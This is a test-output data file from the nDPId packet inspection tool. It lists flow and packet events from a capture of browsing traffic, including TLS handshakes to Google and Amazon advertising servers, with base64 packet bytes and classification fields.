+00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9081,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690384,"flow_last_seen":1605291690384,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690384,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9081,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1605291690384,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690384,"pkt":"qtsDr8lk5EKm5WPyht1gCvtsACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAC58gBu5uynDEAAAAAoAL9IAqWAAACBAWgBAIICgxmJysAAAAAAQMDBw=="} 
+00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9082,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1605291690396,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690396,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgFAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbvHPls7Xl4+krtmoBJXgDq4AAACBAV4AQMDAwQCCArC10mNVF\/tSA=="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9083,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1605291690396,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690396,"pkt":"qtsDr8lk5EKm5WPyht1gB68TACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxz4Buz6Su2ZbO15fgBAB+76yAAABAQgKVF\/tX8LXSY0="} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9084,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690373,"flow_last_seen":1605291690396,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690396,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"adservice.google.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9086,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1605291690402,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690402,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgLAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbvnyP\/5OOmbspwyoBJXgGsCAAACBAV4AQMDAwQCCArC10mUDGYnKw=="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9087,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1605291690402,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690402,"pkt":"qtsDr8lk5EKm5WPyht1gCvtsACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAC58gBu5uynDL\/+TjqgBAB++8BAAABAQgKDGYnPcLXSZQ="} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9088,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690384,"flow_last_seen":1605291690403,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690403,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"adservice.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9089,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690405,"flow_last_seen":1605291690405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690405,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9089,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1605291690405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690405,"pkt":"qtsDr8lk5EKm5WPyht1gBYjGACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAA0X3yltjYBu5sO15YAAAAAoAL9IOjCAAACBAWgBAIICgKUPwEAAAAAAQMDBw=="} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9090,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690421,"flow_last_seen":1605291690421,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690421,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9090,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1605291690421,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690421,"pkt":"qtsDr8lk5EKm5WPyht1gBJW4ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAB6OgBu5zTDYMAAAAAoAL9IIEIAAACBAWgBAIICl8E6ogAAAAAAQMDBw=="} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9093,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1605291690440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690440,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAADRffKUqAcsBIEmLB5kd7IUo3\/YpAbu2Nv\/zx++bDteXoBJXgLoLAAACBAV4AQMDAwQCCArC10m3ApQ\/AQ=="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9094,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1605291690440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690440,"pkt":"qtsDr8lk5EKm5WPyht1gBYjGACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAA0X3yltjYBu5sO15f\/88fwgBAB+z36AAABAQgKApQ\/JMLXSbc="} 
+00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9095,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690405,"flow_last_seen":1605291690440,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690440,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9096,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690373,"flow_last_seen":1605291690448,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690448,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"adservice.google.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9098,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1605291690449,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690449,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgLAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbvo6PvOtUOc0w2EoBJXgGkiAAACBAV4AQMDAwQCCArC10m3XwTqiA=="} +00997{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9099,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690384,"flow_last_seen":1605291690449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690449,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"adservice.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9105,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1605291690449,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690449,"pkt":"qtsDr8lk5EKm5WPyht1gBJW4ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAB6OgBu5zTDYT7zrVEgBAB++0WAAABAQgKXwTqpcLXSbc="} +01010{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9112,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690421,"flow_last_seen":1605291690449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690449,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"8a755a3fef0b189d8ab5b0d10758f68a.safeframe.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9134,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690421,"flow_last_seen":1605291690483,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690483,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"8a755a3fef0b189d8ab5b0d10758f68a.safeframe.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9160,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690405,"flow_last_seen":1605291690501,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":1877,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":1605291690501,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"49b45fc1ab090aa3a159778313fc9b9e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01317{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9166,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605291690405,"flow_last_seen":1605291690502,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":5957,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1605291690502,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","server_names":"aax-eu.amazon-adsystem.com,aax.amazon-adsystem.com,aax-cpm.amazon-adsystem.com,aax-dtb-web.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"49b45fc1ab090aa3a159778313fc9b9e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Amazon, OU=Server CA 1B, CN=Amazon","subjectDN":"CN=aax-eu.amazon-adsystem.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"5D:18:8E:CB:B7:91:5C:79:26:B5:08:49:FF:2C:24:D8:06:54:91:8B"}} 
+00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9279,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9279,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gDDgdACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttYBu\/eX0dQAAAAAoAL9IKwyAAACBAWgBAIIChrDFp8AAAAAAQMDBw=="} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9280,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9280,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gDtx5ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttgBu8JSReQAAAAAoAL9IG1mAAACBAWgBAIIChrDFp8AAAAAAQMDBw=="} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9281,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9281,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gDhnPACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttoBu0y3s24AAAAAoAL9IHV1AAACBAWgBAIIChrDFp8AAAAAAQMDBw=="} 
+00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9282,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9282,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gAc2lACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttwBu9DGzOkAAAAAoAL9INfoAAACBAWgBAIIChrDFp8AAAAAAQMDBw=="} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9283,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9283,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gClWEACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABtt4BuzO7JFQAAAAAoAL9IB2IAAACBAWgBAIIChrDFp8AAAAAAQMDBw=="} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9284,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9284,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gBhSQACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIEQAAAAAAACAKlRYBu2QKygYAAAAAoAL9IOOcAAACBAWgBAIICqpUDK0AAAAAAQMDBw=="} 
+00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9285,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9285,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gBnVWACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGQBuyvivtsAAAAAoAL9IO7kAAACBAWgBAIICriVOzQAAAAAAQMDBw=="} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9286,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
